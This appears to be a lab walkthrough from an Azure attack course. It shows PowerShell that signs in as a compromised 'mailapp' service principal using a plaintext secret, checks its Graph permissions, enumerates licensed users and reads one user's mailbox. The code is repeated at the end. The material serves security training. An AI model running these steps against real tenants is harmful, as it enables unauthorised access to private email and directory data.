Learning Objective 12

Task

In the Attack Lab:

Login to the Pharma Corp tenant as ‘mailapp’ by using the credentials added earlier. − Check the current API Permissions assigned to the service principal.
Read the email content of [email protected].

Applies to: Attack Lab

Topic Covered: Credential Abuse and MS Graph API Permission Abuse

Solution

In Learning Objective 11, we added a new credential for the "mailapp" enterprise application.

We will use these credentials to log in using the Az PowerShell module.

$password = ConvertTo-SecureString 'Tey8Q~S3o84UUg7I_ZAIk7DYI4eNCYE5hy1auaoa' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential('f0823e33-c430-4dd2-a56a-dca3c3a346a4', $password)


Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e0f999c1-86ee-47a0-bfd5-18470154b7cd

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$Params = @{
 "URI" = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/appRoleAssignments"
 "Method" = "GET"
 "Headers" = @{
 "Authorization" = "Bearer $GraphToken"
 "Content-Type" = "application/json"
 }
}
$RoleAssignments = Invoke-RestMethod @Params -UseBasicParsing
$RoleAssignments.value

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/users?`$top=500"
$Params = @{
 "URI" = $URL
 "Method" = "GET"
 "Headers" = @{
 "Content-Type" = "application/json"
 "Authorization" = "Bearer $GraphToken"
 }
}
$Users = Invoke-RestMethod @Params -UseBasicParsing
foreach($User in $Users.value)
{
 $UserID = $User.id
 $URL = "https://graph.microsoft.com/v1.0/users/$UserID/licenseDetails"
 $Params = @{
 "URI" = $URL
 "Method" = "GET"
 "Headers" = @{
 "Content-Type" = "application/json"
 "Authorization" = "Bearer $GraphToken"
 }
 }
 $LicenseDetails = Invoke-RestMethod @Params -UseBasicParsing
 If($LicenseDetails.value -ne "" -and $LicenseDetails.value -ne $null)
 {
 [PSCustomObject]@{
 ID = $User.id
 DisplayName = $User.displayName
 UserPrincipalName = $User.userPrincipalName
 LicenseType = $LicenseDetails.value.skuPartNumber
 }
 }
}

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/users/0505af70-fea0-4dc9-8a8e-89cb1d0a16c5/messages"
$Params = @{
 "URI" = $URL
 "Method" = "GET"
 "Headers" = @{
 "Content-Type" = "application/json"
 "Authorization" = "Bearer $GraphToken"
 }
}
$Emails = Invoke-RestMethod @Params -UseBasicParsing
$Emails.value

PreviousLearning Objective 11 NextLearning Objective 19

Last updated 9 months ago

Was this helpful?

$password = ConvertTo-SecureString 'Tey8Q~S3o84UUg7I_ZAIk7DYI4eNCYE5hy1auaoa' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('f0823e33-c430-4dd2-a56a-dca3c3a346a4', $password) Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e0f999c1-86ee-47a0-bfd5-18470154b7cd

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token $Params = @{ "URI" = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/appRoleAssignments" "Method" = "GET" "Headers" = @{ "Authorization" = "Bearer $GraphToken" "Content-Type" = "application/json" } } $RoleAssignments = Invoke-RestMethod @Params -UseBasicParsing $RoleAssignments.value

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token $URL = "https://graph.microsoft.com/v1.0/users?`$top=500" $Params = @{ "URI" = $URL "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } } $Users = Invoke-RestMethod @Params -UseBasicParsing foreach($User in $Users.value) { $UserID = $User.id $URL = "https://graph.microsoft.com/v1.0/users/$UserID/licenseDetails" $Params = @{ "URI" = $URL "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } } $LicenseDetails = Invoke-RestMethod @Params -UseBasicParsing If($LicenseDetails.value -ne "" -and $LicenseDetails.value -ne $null) { [PSCustomObject]@{ ID = $User.id DisplayName = $User.displayName UserPrincipalName = $User.userPrincipalName LicenseType = $LicenseDetails.value.skuPartNumber } } }

$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token $URL = "https://graph.microsoft.com/v1.0/users/0505af70-fea0-4dc9-8a8e-89cb1d0a16c5/messages" $Params = @{ "URI" = $URL "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } } $Emails = Invoke-RestMethod @Params -UseBasicParsing $Emails.value